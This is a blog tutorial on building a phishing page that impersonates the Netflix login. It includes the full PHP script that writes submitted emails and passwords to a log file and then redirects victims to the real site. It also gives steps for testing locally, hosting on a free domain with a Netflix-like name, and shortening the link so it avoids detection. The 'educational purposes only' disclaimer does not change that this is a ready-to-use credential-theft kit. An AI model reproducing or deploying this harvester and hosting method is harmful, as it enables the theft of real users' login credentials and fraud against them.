How to Create a Phishing Page for Netflix?




By Yugansh Kumar       September 27, 2020




By Yugansh Kumar

September 27, 2020

Ever thought of how hackers steal your critical data or credentials via social engineering or phishing scam? Let’s see in this tutorial how hackers can steal your valuable data via a phishing scam. The first question that pops in mind is, what is phishing?

Disclaimer: This tutorial is strictly for Educational Purposes only do not misuse it, We will not be responsible if it is being misused, and please do not use this tutorial for illegal activities!

Phishing

Phishing is an art of stealing credentials of a person by providing him a similar or a look-alike page/website that he uses to enter his/her credentials. There are tons of ways of Phishing but we’ll be looking at the method that is simple and doesn’t require any programming knowledge.

Building a Phishing page for Netflix

Firstly, visit the Netflix login page and save the source code in your PC (ctrl s).

Now after downloading the source code open it in an editor which is VS code in this case and search(ctrl f) for action=. A form action function will be highlighted then change the URL to a phishingaction.php file which contains a PHP code to capture the request and forward the user to the original Netflix website.

Source code for Netflix Login Page.
Source code for Netflix Login Page.

Creating a PHP File for Password Harvesting

<?php

header (‘Location: https://www.netflix.com/in/login’);

$handle = fopen(“log.txt”, “a”);

foreach($_POST as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, “=”);

fwrite($handle, $value);

fwrite($handle, “\r\n”);

}

fwrite($handle, “\r\n\n\n\n”);

fclose($handle);

exit;

?>

Same as above, save the PHP file as “All Files” and as “phishingaction.php”. Change the encoding to Unicode and you should be ready to go!

Testing the changes in Xampp

Before implementing it to the main hosting service, Let us try if it works in Xampp for testing our phishing page service.

Phishing page

As you can clearly see in the URL this webpage is running on localhost and after clicking the Sign In button it executes the PHP script and it redirects the user to the original Netflix website.

It forms a log file as mentioned in the PHP script.

How to Create a Phishing Page for Netflix? 1
As you can see above the Email ID and Password are here in plain text format.

As we can see this log file consists of the details of the user like the username and password. Which means our phishing page works, Now let’s host this as a website on a free domain called 000.webhost.com.

Hosting the website on a free domain

We will be taking the services of 000.webhost.com which provides free domains. I will register the domain with the name Netflix000 and then shorten the link using any link shortener so it doesn’t get caught.

After completing the formalities required to register a domain we save our .html and .php files there named Index as the host does not allow other names and check if consists of an .htaccess file if these requirements are done then save the files and see the website.

How to Create a Phishing Page for Netflix? 2
How to Create a Phishing Page for Netflix? 3

Now let us confirm if the page is working by taking a use case.

How to Create a Phishing Page for Netflix? 4
How to Create a Phishing Page for Netflix? 5

Voila! The trick works, You have finished hosting your first phishing site! Navigate to your site and check out to enter some fake login details, after you click the login button, it should redirect you to Netflix.com. Login to your FTP server that you simply hosted on the index.html file, and there should be a replacement document called Log.txt that’s stored within an equivalent folder as your index.php file. Any login details should be stored there. Remember, please don’t use this for malicious purposes, only use for penetration testing and with authorization from your victims. So I hope you got to know how the phishing pages work and If you face any difficulties feel free to leave a comment.😃


You Might Also Like

Subscribe to our Newsletter

Advertisement